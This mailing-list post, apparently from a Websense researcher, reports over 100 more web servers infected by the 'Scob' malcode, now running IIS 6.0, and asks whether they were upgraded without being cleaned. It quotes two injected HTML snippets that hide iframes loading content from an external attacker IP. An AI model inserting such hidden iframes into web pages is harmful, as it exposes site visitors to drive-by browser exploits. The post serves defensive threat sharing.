Scob variant using IIS 6.0 or just upgrades ?

["Hubbard, Dan" <dhubbard () websense com>]

Our mining processes have uncovered more than 100 additional sites that
are appear to have been breached and used as part of the "Scob" malcode.
Unlike the other sites discovered these sites are NOT running IIS 5.0
and appear as though they are not using the IIS "footer" vulnerability.
There are two variants of jscript that appear to be using IE Iframe
vulnerabilities that they appear to be exploiting on the client side,
however we cannot tell how the servers have been compromised. This maybe
echo'd information, however I have not seen any IIS 6.0 information
posted anywhere. 

Current theory is that these machines were compromised as IIS 5.0 and
then upgraded but not cleaned.

* all pages are infected with malcode on sites
* 96 out of 100 of the site are running HTTPS also.
* all sites are running IIS 6.0 not 5.0 

These are two variants of the HTML. Both appear at the bottom of the
HTML:

Variant 1
--------------

<script language="JavaScript"><!--
</script><iframe src=\"http://217.107.218.147/dot.php\"; height=\"1\"
width=\"1\" scrolling=\"no\"
frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>


Variant 2
--------------

<iframe width=0 height=0 src="http://217.107.218.147/fed.html";></iframe>

**Does anyone else have information as to what the URL's outlined above
contained and/or any information about compromised IIS 6.0 machines ?**

**Perhaps these machines have simply been upgraded and the malcode was
not "cleaned" off them ? **



_______________________________
Dan Hubbard
Security & Technology Research
Websense, Inc.